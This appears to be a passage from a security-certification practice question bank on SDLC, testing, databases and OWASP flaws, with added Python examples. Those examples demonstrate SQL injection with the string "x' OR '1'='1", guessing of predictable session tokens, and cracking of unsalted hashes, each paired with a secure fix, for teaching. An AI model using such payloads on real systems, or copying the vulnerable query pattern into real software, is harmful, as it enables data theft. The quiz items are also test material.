c. Activity logs contain a record of all the test cases executed. Incident reports show a priority assigned to test problems during test execution. All incidents logged should be resolved within a reasonable time. Software versioning controls the program source versions to ensure that there is no duplication or confusion between multiple versions. Test cases and test documentation are incorrect because test cases contain a listing of all possible tests to be executed with their associated data and test documentation includes test plans, test objectives, and approaches. Test summaries and test execution reports are incorrect because test summary is a brief description of what is changing. Key words are used so that project personnel reading the log can scan for items that may affect their work. Test execution reports show a status of software testing execution to management with summary information. Test cases rejected and test cases accepted are incorrect because they simply list what test cases were rejected or accepted. The documents such as test cases, test documentation, test summaries, test execution reports, and test cases rejected and accepted do not have the same monitoring and controlling effect as do the documents such as activity logs, incident reports, and software versioning.
1074
Which of the following software testing levels is least understood by software developers and end users? a. Integration testing b. Unit testing c. System testing d. Module testing
a. Integration testing is conducted when software units are integrated with other software units or with system components. Its objective is to test the interfaces among separately tested program units. Software integration tests check how the units interact with other software (for example, libraries) and with hardware. Integration testing sits in the middle; it is neither unit testing nor system testing. The approach varies: top-down, bottom-up, a combination of the two (sandwich), or all-at-once (big bang). Because integration testing can be conducted in so many ways, and because there is no base document such as a specification to test against, its objectives are harder to understand clearly. Unit testing and module testing are incorrect because they are the best understood of all. Unit testing is the same as module testing. Unit/module test cases are derived from the detailed design documentation of the unit. Each unit or module has a defined beginning and ending and deals with specific inputs and outputs; its boundaries are well defined. System testing is incorrect because it is better understood than integration testing. End users know what they expect from the system because it is based on functional rather than structural knowledge, and system test cases are derived from the requirements specification document.
1075
Which of the following system development approaches is best when system requirements are fully understood by either the end user or the software developer? a. Waterfall model b. Incremental development model c. Evolutionary development model d. Rapid prototyping model
a. Functional decomposition works best when the system requirements are completely understood by the software developer or the end user. The waterfall model is built on the functional decomposition principle: it assumes that system requirements can be defined thoroughly and that end users know exactly what they want from the system. Incremental and evolutionary development models are incorrect because successive versions of the system are developed to reflect constrained technology or resources; requirements are added in a layered manner. The rapid prototyping model is incorrect because it is the opposite of the waterfall model: it suits situations where requirements are not fully understood by either party. Its iterative process shortens the specification-to-customer feedback cycle, producing early versions of the system.
1075
Which of the following is the least beneficial of an application software test log? a. Recording actions for problem resolution b. Tracing events on post-test basis c. Reporting problems for compliance to a policy d. Promoting tester accountability
c. An application software test log has several benefits. Reporting problems for the sake of reporting/compliance to a policy or a procedure is the least beneficial. What is done with the report is more important than just reporting. The other three choices are incorrect because they are the most important benefits. The log shows a record of all problems encountered during testing so events can be traced for verification. The log can also be used as a training tool for new testers because the log shows what happened in the past. Most of all, the log indicates what the tester did or did not do during testing. It forces testers to document the actions or decisions taken place during testing.
1076
The application software test objective of verifying boundary conditions of a program is achieved in which of the following types of software testing approaches? a. Stress testing b. Conversion testing c. Performance testing d. Regression testing
a. Stress testing involves the response of the system to extreme conditions (for example, an exceptionally high workload over a short span of time) to identify vulnerable points within the software and to show that the system can withstand normal workloads. Examples of testing conditions that can be applied during stress testing include the following: (i) if the size of the database plays an important role, increase it beyond normal conditions, (ii) increase the input changes or demands per time unit beyond normal conditions, (iii) tune influential factors to their maximum or minimum speed, and (iv) for the most extreme cases, put all influential factors at their boundary conditions at the same time. Stress testing can detect design errors related to the full-service requirements of the system and errors in planning defaults for when the system is overstressed. Conversion testing is incorrect because it determines whether old data files and record balances are carried forward accurately, completely, and properly to the new system. Performance testing is incorrect because it measures resources required, such as memory and disk, and determines system response time. Regression testing is incorrect because it verifies that changes do not introduce new errors.
1076
Security categorization is performed in which of the following phases of an application system development life cycle (SDLC)? a. Initiation b. Development/acquisition c. Implementation d. Operations/maintenance
a. Security categorization standards provide a common framework for expressing security needs. Categorization is based on an assessment of the potential impact (i.e., low, moderate, or high) that a loss of confidentiality, integrity, or availability of information systems would have on organizational operations, organizational assets, or individuals. It is a task performed in the initiation phase.
1076
Configuration management and control is performed in which of the following phases of a system development life cycle (SDLC)? a. Initiation b. Development/acquisition c. Implementation d. Operations/maintenance
d. Configuration management and control ensures adequate consideration of the potential security impacts due to specific changes to an information system or its surrounding environment. It is a task performed in the operation/maintenance phase.
1077
In which of the following system development life cycle (SDLC) models has the concept of application software reuse been incorporated? a. Waterfall model b. Object-oriented model c. Prototype model d. Spiral model
b. The notion of software component reuse was developed with the invention of the object-oriented development approach. After the design model has been created, the software developer browses a library, or repository, that contains existing program components to determine whether any of them can be used in the design at hand. If reusable components are found, they are used as building blocks to construct a prototype of the software. The waterfall model is incorrect because it takes a linear, sequential view of the software engineering process; the waterfall method is another name for the classic software development life cycle. The prototype model is incorrect because it is a process that enables the developer to create a model of the software built in an evolutionary manner. The spiral model is incorrect because it is another type of evolutionary model, developed to provide the best features of both the classic life cycle approach and prototyping. None of these three choices provides for software reuse.
1078
Continuous monitoring is performed in which of the following phases of a system development life cycle (SDLC)? a. Initiation b. Development/acquisition c. Implementation d. Operations/maintenance
d. Continuous monitoring ensures that controls continue to be effective in their application through periodic testing and evaluation. It is a task performed in the operation/maintenance phase.
1079
Which of the following are examples of local threats in Windows XP systems? a. Unauthorized local access and malicious payloads b. Boot process and privilege escalation c. Network services and data disclosure d. Boot process and data disclosure
b. Local threats in Windows XP systems include boot process, unauthorized local access, and privilege escalation. A boot process threat results when an unauthorized individual boots a computer from third-party media (for example, removable drives and universal serial bus [USB] token storage devices), which permits the attacker to circumvent operating system security measures. An unauthorized local-access threat results when an individual who is not permitted to access a computer system gains local access. A privilege escalation threat results when an authorized user with normal user-level rights escalates the account’s privileges to gain administrator-level access. Remote threats in Windows XP systems include network services, data disclosure, and malicious payloads. A network service threat results when remote attackers exploit vulnerable network services on a computer system. This includes gaining unauthorized access to services and data, and causing a denial-of-service (DoS) condition. A data disclosure threat results when a third party intercepts confidential data sent over a network. A malicious payload threat results when malicious payloads (for example, viruses, worms, Trojan horses, and active content) attack computer systems through many vectors. System end users may accidentally trigger malicious payloads.
1080
Attackers can use which of the following flaws to attack back-end components through a Web application? a. Broken access control b. Unvalidated input c. Broken authentication d. Cross-site scripting flaws
b. According to the Open Web Application Security Project (OWASP), this is the unvalidated input flaw: information from Web requests is not validated before being used by a Web application, so an attacker can craft request data that reaches and attacks back-end components (for example, a database or the operating system) through the application.
1081
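An added worked example, not part of the question bank, of the unvalidated input flaw described above: the same lookup written so that request data is spliced into the SQL text, then parameterized, then additionally allow-list validated at the trust boundary. The users table, its rows and the attack string are constructed for the example, and the function names are my own.

```python
# Added example, not part of the question bank: unvalidated request data
# reaching a back-end database. Table and rows below are constructed sample data.
import sqlite3

# Constructed sample data standing in for a real users table.
SAMPLE_USERS = [("alice", "alice@example.com"), ("bob", "bob@example.com")]


def _connect():
    """Fresh in-memory database seeded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_email_vulnerable(name):
    """Request value spliced into the SQL text without validation: the caller
    can change the meaning of the query (here, make the WHERE clause always true)."""
    conn = _connect()
    sql = "SELECT email FROM users WHERE name = '%s'" % name
    return [row[0] for row in conn.execute(sql)]


def lookup_email_safe(name):
    """Same lookup, parameterized: the driver sends the value as data, never as SQL."""
    conn = _connect()
    rows = conn.execute("SELECT email FROM users WHERE name = ?", (name,))
    return [row[0] for row in rows]


def is_valid_username(name):
    """Allow-list validation applied at the trust boundary, before the value is
    handed to any back-end component. Rejects quotes, spaces and over-long input."""
    return 1 <= len(name) <= 32 and name.isascii() and name.isalnum()


def handle_request(name):
    """What the application should do: validate first, then query with parameters."""
    if not is_valid_username(name):
        return None  # reject; a real application would return 400 and log the attempt
    return lookup_email_safe(name)


if __name__ == "__main__":
    payload = "x' OR '1'='1"  # constructed attack string
    print("vulnerable:", lookup_email_vulnerable(payload))  # every email leaks
    print("parameterized:", lookup_email_safe(payload))     # no match
    print("validated:", handle_request(payload))            # rejected
```

The parameterized query alone stops the injection; the allow-list check is the "validate before use" control the question is about, and it also keeps hostile values out of logs, error messages and any other back-end component the value might later reach.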
The information systems security analyst’s participation in which of the following system development life cycle (SDLC) phases provides maximum benefit to the organization? a. System requirements definition b. System design c. Program development d. Program testing
a. It is during the system requirements definition phase that the project team identifies the controls required for the system. The identified controls are then incorporated into the system during the design phase. When there is a choice between the system requirements definition phase and the design phase, the analyst's participation benefits the organization most in the former. The analyst does not need to participate in the program development or testing phase.
1082
What is a malicious unauthorized act that is triggered upon initiation of a predefined event or condition and resides within a computer program known as? a. Logic bomb b. Computer virus c. Worm d. NAK attack
a. A time bomb is a part of a logic bomb. A time bomb is a Trojan horse set to trigger at a particular time, whereas the logic bomb is set to trigger on a particular condition, event, or command. The logic bomb could be a computer program or a code fragment. Computer virus is incorrect because a virus "reproduces" by making copies of itself and inserting them into other programs. Worm is incorrect because a worm searches the network for idle computing resources and uses them to execute the program in small segments. NAK (negative acknowledgment character) attack is incorrect because it is a penetration technique capitalizing on a potential weakness in an operating system that does not handle asynchronous interrupts properly, leaving the system in an unprotected state during such interrupts. NAK uses binary synchronous communications, where a transmission control character is sent as a negative response to data received; the negative response means the data was not received correctly or that a command was incorrect or unacceptable.
1083
What is the name of the malicious act of a computer program looking normal but containing harmful code? a. Trapdoor b. Trojan horse c. Worm d. Time bomb
b. A Trojan horse fits the description: a program that appears to perform a useful function but also carries out an unexpected, harmful action. Trapdoor is incorrect because it is an entry point built into a program by programmers for debugging purposes. Worm is incorrect because a worm searches the network for idle computing resources and uses them to execute a program in small segments. Time bomb is incorrect because it is a part of a logic bomb, where a damaging act triggers at some period of time after the bomb is set.
1083
In the software capability maturity model, continuous process improvement takes place in which of the following levels? a. Managed level b. Optimizing level c. Defined level d. Repeatable level
b. Continuous process improvements are expected in the optimizing level of the software capability maturity model. It is enabled by quantitative feedback from the process and from piloting innovative ideas and technologies.
1084
Which of the following tests identify vulnerabilities in application systems? a. Functional test b. Performance test c. Stress test d. Security test
d. The purpose of security testing is to assess the robustness of the system’s security capabilities (for example, physical facilities, procedures, hardware, software, and communications) and to identify security vulnerabilities. All the tests listed in the question are part of system acceptance tests where the purpose is to verify that the complete system satisfies specified requirements and is acceptable to end users. Functional test is incorrect because the purpose of functional or black box testing is to verify that the system correctly performs specified functions. Performance test is incorrect because the purpose of performance testing is to assess how well a system meets specified performance requirements. Examples include specified system response times under normal workloads (for example, defined transaction volumes) and specified levels of system availability and mean-times-to-repair. Stress test is incorrect because the purpose of stress testing is to analyze system behavior under increasingly heavy workloads (for example, higher transaction rates), severe operating conditions (for example, higher error rates, lower component availability rates), and, in particular, to identify points of system failure.
1085
When does a major risk in application software prototyping occur? a. The prototype becomes the finished system. b. User’s expectations are inflated. c. Too much attention is paid to cosmetic details. d. The model is iterated too many times.
a. The application software prototype becoming the finished system is a major risk in prototyping unless this is a conscious decision, as in evolutionary prototyping where a pilot system is built, thrown away, another system is built, and so on. Inflated user expectations is a risk that can be managed with proper education and training. Paying attention to cosmetic details is not bad except that it wastes valuable time. The prototype model is supposed to be iterated many times because that is the best way to define and redefine user requirements and security features until satisfied.
1085
Security planning is performed in which of the following phases of a system development life cycle (SDLC)? a. Initiation b. Development/acquisition c. Implementation d. Operations/maintenance
b. Security planning ensures that agreed-upon security controls, whether planned or in place, are fully documented. It is a task performed in the development/acquisition phase.
1086
Which of the following actions is performed in the detailed design phase of a system development life cycle (SDLC) project? a. Defining control, security, and audit requirements b. Developing screen flows with specifications c. Identifying major purpose(s) of the system d. Developing system justification
b. A detailed design occurs after the general design is completed where known tasks are described and identified in a much more detailed fashion and are ready for program design and coding. This includes developing screen/program flows with specifications, input and output file specifications, and report specifications. The other three choices are incorrect because, by definition, they are examples of activities taking place in the general design phase. System requirements are the input to the general design where the system is viewed from top-down and where higher-level design issues are addressed. This includes (i) identifying the purpose and major functions of the system and its subsystems, (ii) defining control, security, and audit requirements, and (iii) developing system justification for the approval of analysis of alternative design choices.
1087
When attackers compromise passwords, keys, and session cookies, it can lead to which of the following flaws? a. Broken access control b. Unvalidated input c. Broken authentication d. Cross-site scripting flaws
c. Broken authentication means account credentials and session tokens are not properly protected. Attackers that can compromise passwords, keys, session cookies, or other tokens can defeat authentication restrictions and assume other user’s identities.
1087
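An added worked example, not part of the question bank, of what "properly protected" session tokens mean in practice: a token derived from guessable inputs that an attacker can regenerate, next to a server-side session store whose tokens are unpredictable, expiring, revocable and compared in constant time. The user ids, timestamps and class and function names are constructed for the example.

```python
# Added example, not part of the question bank: why credentials and session tokens
# need protection. Values and user ids are constructed; no real system is modelled.
import hashlib
import hmac
import secrets
import time


def weak_session_token(user_id, now):
    """Anti-pattern: token derived from guessable inputs (user id and clock second).
    An attacker who knows the user id can regenerate it by trying nearby timestamps."""
    return hashlib.md5(f"{user_id}:{now}".encode()).hexdigest()


def guess_weak_tokens(user_id, approx_time, window=5):
    """The attack: enumerate the small timestamp window around the victim's login."""
    return {weak_session_token(user_id, t)
            for t in range(approx_time - window, approx_time + window + 1)}


class SessionStore:
    """Server-side sessions: the cookie carries only an unguessable handle, the
    server holds the identity, and every token expires and can be revoked."""

    def __init__(self, ttl_seconds=900):
        self._sessions = {}  # token -> (user_id, expiry time)
        self.ttl = ttl_seconds

    def issue(self, user_id, now=None):
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._sessions[token] = (user_id, now + self.ttl)
        return token

    def resolve(self, token, now=None):
        """Returns the user id for a live token, else None. Tokens are compared in
        constant time so response timing does not leak how much of a guess matched."""
        now = time.time() if now is None else now
        if not isinstance(token, str) or not token.isascii():
            return None  # compare_digest only accepts ASCII str; fail closed
        match = None
        for stored in self._sessions:
            if hmac.compare_digest(stored, token):
                match = stored
        if match is None:
            return None
        user_id, expires = self._sessions[match]
        if now >= expires:
            del self._sessions[match]  # expired: remove and fail closed
            return None
        return user_id

    def revoke(self, token):
        """Logout or password change: invalidate the token on the server side."""
        self._sessions.pop(token, None)


def set_cookie_header(token):
    """Cookie attributes that keep the token away from scripts and plaintext links."""
    return f"Set-Cookie: session={token}; HttpOnly; Secure; SameSite=Lax; Path=/"
```

The weak scheme fails because its inputs are knowable, not because MD5 is weak; a SHA-256 of the same inputs would be just as guessable. The store scans all sessions so that lookup time does not depend on the token; a production store would index by an HMAC of the token instead.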
Attackers use which of the following to corrupt a Web application execution stack? a. Buffer overflows b. Injection flaws c. Denial-of-service d. Improper error handling
a. Buffer overflows occur when web application components (for example, common gateway interface, libraries, drivers, and Web application servers) that do not properly validate input can be crashed and, in some cases, used to take control of a process.
1088
When Web applications use cryptographic functions that have proven difficult to code properly, it can lead to which of the following? a. Insecure storage b. Improper error handling c. Injection flaws d. Insecure configuration management
a. Web applications frequently use cryptographic functions to protect information and credentials in storage. These functions and the code to integrate them have proven difficult to code properly, frequently resulting in weak protection.
1088
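An added worked example, not part of the question bank, of the insecure storage flaw above applied to stored credentials: an unsalted fast hash that an attacker cracks offline from a small word list, next to password storage built on a purpose-made key derivation function (PBKDF2-HMAC-SHA256 from the standard library) with a random salt, recorded parameters and constant-time verification. The passwords, the word list and the function names are constructed for the example.

```python
# Added example, not part of the question bank: credential storage done badly and
# done with a purpose-built password KDF. Passwords and word list are constructed.
import base64
import hashlib
import hmac
import secrets

# Constructed: a tiny "leaked" word list an attacker might try.
WORDLIST = ["password", "letmein", "Summer2024", "hunter2"]


def store_weak(password):
    """Anti-pattern: unsalted, fast hash. Identical passwords give identical hashes,
    and one table of precomputed hashes cracks every account at once."""
    return hashlib.sha256(password.encode()).hexdigest()


def crack_weak(digest, wordlist=WORDLIST):
    """Offline guessing against the weak scheme: one cheap SHA-256 per candidate."""
    for candidate in wordlist:
        if store_weak(candidate) == digest:
            return candidate
    return None


def hash_password(password, iterations=600_000):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt. The encoded record carries the
    parameters so the cost can be raised later without breaking old records."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, dklen=32)
    return "pbkdf2_sha256${}${}${}".format(
        iterations,
        base64.b64encode(salt).decode(),
        base64.b64encode(dk).decode(),
    )


def verify_password(password, encoded):
    """Recompute with the stored parameters; constant-time comparison of the result."""
    try:
        scheme, iterations, salt_b64, dk_b64 = encoded.split("$")
        if scheme != "pbkdf2_sha256":
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(dk_b64)
        iterations = int(iterations)
    except (ValueError, TypeError):
        return False  # malformed record: fail closed
    actual = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations,
                                 dklen=len(expected))
    return hmac.compare_digest(actual, expected)


if __name__ == "__main__":
    print("weak scheme cracked as:", crack_weak(store_weak("hunter2")))
    record = hash_password("hunter2")
    print("stored record:", record)
    print("verify correct:", verify_password("hunter2", record))
    print("verify wrong:", verify_password("hunter3", record))
```

The salt makes every record unique even for equal passwords, the iteration count makes each guess expensive, and keeping the parameters inside the record is what lets the cost be raised over time. This is the kind of detail that is easy to get wrong when the primitives are assembled by hand, which is the point of the question.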
The RGO Company is undertaking a new business process that represents a 15 percent increase in volume and a 10 percent increase in the number of employees. The business is dependent on software to run remote processing. The new process needs to be tested fully before implementation. To maintain the stability of the current business and create a smooth transition to the new business process, the company is going to employ a system development life cycle (SDLC) methodology. RGO cannot afford to fail. Security planning is performed in which of the following phases of an SDLC? a. Initiation b. Development/acquisition c. Implementation d. Operations/maintenance
b. Security planning ensures that agreed-upon security controls, whether planned or in place, are fully documented. It is a task performed in the development/acquisition phase.
1089
The RGO Company is undertaking a new business process that represents a 15 percent increase in volume and a 10 percent increase in the number of employees. The business is dependent on software to run remote processing. The new process needs to be tested fully before implementation. To maintain the stability of the current business and create a smooth transition to the new business process, the company is going to employ a system development life cycle (SDLC) methodology. RGO cannot afford to fail. Security categorization is performed in which of the following phases of an SDLC methodology? a. Initiation b. Development/acquisition c. Implementation d. Operations/maintenance
a. Security categorization standards provide a common framework for expressing security needs. Categorization is based on an assessment of the potential impact (i.e., low, moderate, or high) that a loss of confidentiality, integrity, or availability of information systems would have on organizational operations, organizational assets, or individuals. It is a task performed in the initiation phase.
1090
The RGO Company is undertaking a new business process that represents a 15 percent increase in volume and a 10 percent increase in the number of employees. The business is dependent on software to run remote processing. The new process needs to be tested fully before implementation. To maintain the stability of the current business and create a smooth transition to the new business process, the company is going to employ a system development life cycle (SDLC) methodology. RGO cannot afford to fail. Configuration management and control is performed in which of the following phases of an SDLC? a. Initiation b. Development/acquisition c. Implementation d. Operations/maintenance
d. Configuration management and control ensures adequate consideration of the potential security impacts due to specific changes to an information system or its surrounding environment. It is a task performed in the operation/maintenance phase.
1091
The RGO Company is undertaking a new business process that represents a 15 percent increase in volume and a 10 percent increase in the number of employees. The business is dependent on software to run remote processing. The new process needs to be tested fully before implementation. To maintain the stability of the current business and create a smooth transition to the new business process, the company is going to employ a system development life cycle (SDLC) methodology. RGO cannot afford to fail. Continuous monitoring is performed in which of the following phases of an SDLC? a. Initiation b. Development/acquisition c. Implementation d. Operations/maintenance
d. Continuous monitoring ensures that controls continue to be effective in their application through periodic testing and evaluation. It is a task performed in the operation/maintenance phase.
1091
The RGO Company is undertaking a new business process that represents a 15 percent increase in volume and a 10 percent increase in the number of employees. The business is dependent on software to run remote processing. The new process needs to be tested fully before implementation. To maintain the stability of the current business and create a smooth transition to the new business process, the company is going to employ a system development life cycle (SDLC) methodology. RGO cannot afford to fail. Security certification and accreditation is performed in which of the following phases of an SDLC? a. Initiation b. Development/acquisition c. Implementation d. Operations/maintenance
c. Security certification ensures that the controls are effectively implemented through established verification techniques and procedures and gives an organization confidence that the appropriate safeguards and countermeasures are in place to protect the organization’s information systems. Security accreditation provides the necessary security authorization of an information system to process, store, or transmit information that is required. Both security certification and accreditation tasks are performed in the implementation phase.
1092
The RGO Company is undertaking a new business process that represents a 15 percent increase in volume and a 10 percent increase in the number of employees. The business is dependent on software to run remote processing. The new process needs to be tested fully before implementation. To maintain the stability of the current business and create a smooth transition to the new business process, the company is going to employ a system development life cycle (SDLC) methodology. RGO cannot afford to fail. Media sanitization is performed in which of the following phases of an SDLC? a. Development/acquisition b. Implementation c. Operations/maintenance d. Disposition
d. Media sanitization ensures that data is deleted, erased, and written over as necessary. It is a task performed in the disposition phase.
1092
The RGO Company is undertaking a new business process that represents a 15 percent increase in volume and a 10 percent increase in the number of employees. The business is dependent on software to run remote processing. The new process needs to be tested fully before implementation. To maintain the stability of the current business and create a smooth transition to the new business process, the company is going to employ a system development life cycle (SDLC) methodology. RGO cannot afford to fail. Security controls and audit trails should be built into computer systems in which of the following SDLC phases? a. System initiation phase b. System development phase c. System implementation phase d. System operation phase
b. During the system development phase, the system is designed, purchased, programmed, developed, or otherwise constructed. During this phase, functional users with system/security administrators develop system controls and audit trails used during the operational phase.
1093
The RGO Company is undertaking a new business process that represents a 15 percent increase in volume and a 10 percent increase in the number of employees. The business is dependent on software to run remote processing. The new process needs to be tested fully before implementation. To maintain the stability of the current business and create a smooth transition to the new business process, the company is going to employ a system development life cycle (SDLC) methodology. RGO cannot afford to fail. Which of the following phases of a system development life cycle (SDLC) should not be compressed so much for the proper development of a prototype? a. Initiation b. Development/acquisition c. Implementation d. Operation/maintenance
c. System testing, which is a part of implementation, is important to determine whether internal controls and security controls are operating as designed and in accordance with established policies and procedures. In the prototyping environment, there is a tendency to compress the system initiation, definition, design, programming, and training phases. The testing phase, however, should not be compressed as much, for quality reasons. By definition, prototyping requires some compression of activities and time because of the speedy nature of the prototyping development methodology, but without loss of the main features, functions, and quality.
1094
The RGO Company is undertaking a new business process that represents a 15 percent increase in volume and a 10 percent increase in the number of employees. The business is dependent on software to run remote processing. The new process needs to be tested fully before implementation. To maintain the stability of the current business and create a smooth transition to the new business process, the company is going to employ a system development life cycle (SDLC) methodology. RGO cannot afford to fail. The activity that would be different between a prototype development approach and the traditional system development approach is: a. How activities are to be accomplished b. What users need from the system c. What a project plan should contain d. How individual responsibilities are defined
a. Managers still need to define what they want from the system, some assessment of costs/benefits is still needed, and a plan to proceed with individual responsibilities is still required. The difference may be in the way activities are accomplished. The tools, techniques, methods, and approaches used in the prototype development project and traditional system development project are different.
1094
Fred has been told he needs to test a component of the new content management application under development to validate its data structure, logic, and boundary conditions. What type of testing should he carry out? A. Acceptance testing B. Regression testing C. Integration testing D. Unit testing
D. Unit testing involves testing an individual component in a controlled environment to validate data structure, logic, and boundary conditions. After a programmer develops a component, it is tested with several different input values and in many different situations. Unit testing can start early in development and usually continues throughout the development phase. One of the benefits of unit testing is finding problems early in the development cycle, when it is easier and less expensive to make changes to individual units. A is incorrect because acceptance testing is carried out to ensure that the code meets customer requirements. This testing is for part or all of the application, but not commonly one individual component. B is incorrect because regression testing refers to the retesting of a system after a change has taken place to ensure its functionality, performance, and protection. Essentially, regression testing is done to identify bugs that have caused functionality to stop working as intended as a result of program changes. It is not unusual for developers to fix one problem, only to inadvertently create a new problem, or for the new fix to break a fix to an old problem. Regression testing may include checking previously fixed bugs to make sure they have not re-emerged and rerunning previous tests. C is incorrect because integration testing involves verifying that components work together as outlined in design specifications. After unit testing, the individual components or units are combined and tested together to verify that they meet functional, performance, and reliability requirements.
1095
Lisa has learned that most databases implement concurrency controls. What is concurrency and why must it be controlled? A. Processes running at different levels, which can negatively affect the integrity of the database if not properly controlled. B. The ability to deduce new information from reviewing accessible data, which can allow an inference attack to take place. C. Processes running simultaneously, which can negatively affect the integrity of the database if not properly controlled. D. Storing data in more than one place within a database, which can negatively affect the integrity of the database if not properly controlled.
C. Databases are commonly used by many different applications simultaneously and many users interacting with them at one time. Concurrency means that different processes (applications and users) are accessing the database at the same time. If this is not controlled properly, the processes can overwrite each other’s data or cause deadlock situations. The negative result of concurrency problems is the reduction of the integrity of the data held within the database. Database integrity is provided by concurrency protection mechanisms. One concurrency control is locking, which prevents users from accessing and modifying data being used by someone else. A is incorrect because concurrency refers to processes running simultaneously, not at different levels. Concurrency issues come up when the database can be accessed at the same time by different users and/or applications. If controls are not in place, two users can access and modify the same data at the same time, which can be detrimental to a dynamic environment. B is incorrect because the ability to deduce new information from reviewing accessible data occurs when a subject at a lower security level indirectly guesses or infers data at a higher level. This can lead to an inference attack. It is not related to concurrency. Concurrency has to do with integrity, while inference is related to confidentiality. D is incorrect because storing data in more than one place is not a problem with concurrency. Concurrency becomes a problem when two subjects or applications are trying to modify the same data at the same time.
1096
Which of the following correctly best describes an object oriented database? A. When an application queries for data, it receives both the data and the procedure. B. It is structured similarly to a mesh network for redundancy and fast data retrieval. C. Subject must have knowledge of the well-defined access path in order to access data. D. The relationships between data entities provide the framework for organizing data.
A. In an object-oriented database, objects are instantiated when needed, and the data and procedure (called method) go with the object when it is requested. This differs from a relational database, in which the application uses its own procedures to obtain and process data when retrieved from the database. B is incorrect because a mesh network is a physical topology and has nothing to do with databases. A mesh topology is a network of interconnected routers and switches that provides multiple paths to all the nodes on the network. In a full mesh topology, every node is directly connected to every other node, which provides a great degree of redundancy. In a partial mesh topology, every node is not directly connected. The Internet is an example of a partial mesh topology. C is incorrect because subjects accessing a hierarchical database—not an object-oriented database—must have knowledge of the access path in order to access data. In the hierarchical database model, records and fields are related in a logical tree structure. Parents can have one child, many children, or no children. The tree structure contains branches, and each branch has a number of data fields. To access data, the application must know which branch to start with and which route to take through each layer until the data is reached. D is incorrect because the relationships between data entities provide the framework for organizing data in a relational database. A relational database is composed of two-dimensional tables, and each table contains unique rows, columns, and cells. Each cell contains one data value that represents a specific attribute within a given row. These data entities are linked by relationships, which provide the framework for organizing the data.
1097
Robert has been asked to increase the overall efficiency of the sales database by implementing a procedure that structures data to minimize duplication and inconsistencies. What procedure is this? A. Polymorphism B. Normalization C. Implementation of database views D. Constructing schema
B. Normalization is a process that eliminates redundancy, organizes data efficiently, reduces the potential for anomalies during data operations, and improves data consistency within databases. It is a systematic way of ensuring that a database structure is designed properly to be free of certain undesirable characteristics—insertion, update, and deletion anomalies—that could lead to a loss of data integrity. A is incorrect because polymorphism is when different objects are given the same input and react differently. As a simplistic example of polymorphism, suppose three different objects receive the input “Bob.” Object A would process this input and produce the output “43-year-old white male.” Object B would receive the input “Bob” and produce the output “Husband of Sally.” Object C would produce the output “Member of User group.” Each object received the same input but responded with a different output. C is incorrect because database views are logical access controls and are implemented to permit one group, or a specific user, to see certain information while restricting another group from viewing it altogether. For example, database views can be implemented to allow middle management to see their departments’ profits and expenses without viewing the whole company’s profits. Database views do not minimize duplicate data; rather, they manipulate how data is viewed by specific users/groups. D is incorrect because schema of a database system is its structure described in a formal language. In a relational database, the schema defines the tables, the fields, relationships, views, indexes, procedures, queues, database links, directories, and so on. The schema describes the database and its structure, but not the data that will live within that database itself. This is similar to a blueprint of a house. The blueprint can state that there will be four rooms, six doors, 12 windows, and so on without describing the people who will live in the house.
1097
The RGO Company is undertaking a new business process that represents a 15 percent increase in volume and a 10 percent increase in the number of employees. The business is dependent on software to run remote processing. The new process needs to be tested fully before implementation. To maintain the stability of the current business and create a smooth transition to the new business process, the company is going to employ a system development life cycle (SDLC) methodology. RGO cannot afford to fail. A general testing strategy for conducting application software regression testing includes which of the following sequences of tasks? a. Read, insert, and delete b. Precompile, link, and compile c. Prepare, execute, and delete d. Test, debug, and log
c. Each test program involves preparing the executable program, executing it, and deleting it. This saves space on mass storage and generates a complete log. This approach is recommended for debugging and validating purposes. Read, insert, and delete describes transferring all rows from Table A to Table B: the table is read, inserted, and deleted. A source program is precompiled, linked, and compiled to become an object or executable program.
1098
Database software should meet the requirements of what is known as the ACID test. Why should database software carry out atomic transactions, which is one requirement of the ACID test, when OLTP is used? A. So that the rules for database integrity can be established B. So that the database performs transactions as a single unit without interruption C. To ensure that rollbacks cannot take place D. To prevent concurrent processes from interacting with each other
B. Online transaction processing (OLTP) is used when databases are clustered to provide high fault tolerance and performance. It provides mechanisms to watch for and deal with problems when they occur. For example, if a process stops functioning, the monitor mechanisms within OLTP can detect this and attempt to restart the process. If the process cannot be restarted, then the transaction taking place will be rolled back to ensure no data is corrupted or that only part of a transaction happens. OLTP records transactions as they occur (in real time), which usually updates more than one database in a distributed environment. This type of complexity can introduce many integrity threats, so the database software should implement the characteristics of what’s known as the ACID test:
* Atomicity: Divides transactions into units of work and ensures that all modifications take effect or none takes effect. Either the changes are committed or the database is rolled back.
* Consistency: A transaction must follow the integrity policy developed for that particular database and ensure all data are consistent in the different databases.
* Isolation: Transactions execute in isolation until completed, without interacting with other transactions. The results of the modification are not available until the transaction is completed.
* Durability: Once the transaction is verified as accurate on all systems, it is committed, and the databases cannot be rolled back.
The term “atomic” means that the units of a transaction will occur together or not at all, thereby ensuring that if one operation fails, the others will not be carried out and corrupt the data in the database. A is incorrect because OLTP and ACID enforce, but do not establish, the integrity rules that are outlined in the database security policy. Representing the letter C in ACID, consistency relates to the enforcement and enforceability of integrity rules. Database software that demonstrates consistency conducts transactions that follow a specific integrity policy and ensure all data are the same in the different databases. C is incorrect because atomicity divides transactions into units of work and ensures that all modifications take effect or none takes effect. Either the changes are committed or the database is rolled back. This means if something does not happen correctly, the database is reverted (rolled back) to its original state. After the transaction happens properly, a rollback cannot take place, which is the durability component of the ACID test. This question is specifically asking about the atomic transaction approach, not durability. D is incorrect because atomic transactions do not address the isolation of processes that are carrying out database transactions; this is the “isolation” component of the ACID test. It is important that a process that is carrying out a transaction cannot be interrupted or modified by another process. This is to ensure the integrity, accuracy, and confidentiality of the data that is being processed during the transaction.
1099
Which of the following is the best description of a component based system development method? A. Components periodically revisit previous stages to update and verify design requirements B. Minimizes the use of arbitrary transfer control statements between components C. Uses independent and standardized modules that are assembled into serviceable programs D. Implemented in module-based scenarios requiring rapid adaptations to changing client requirements
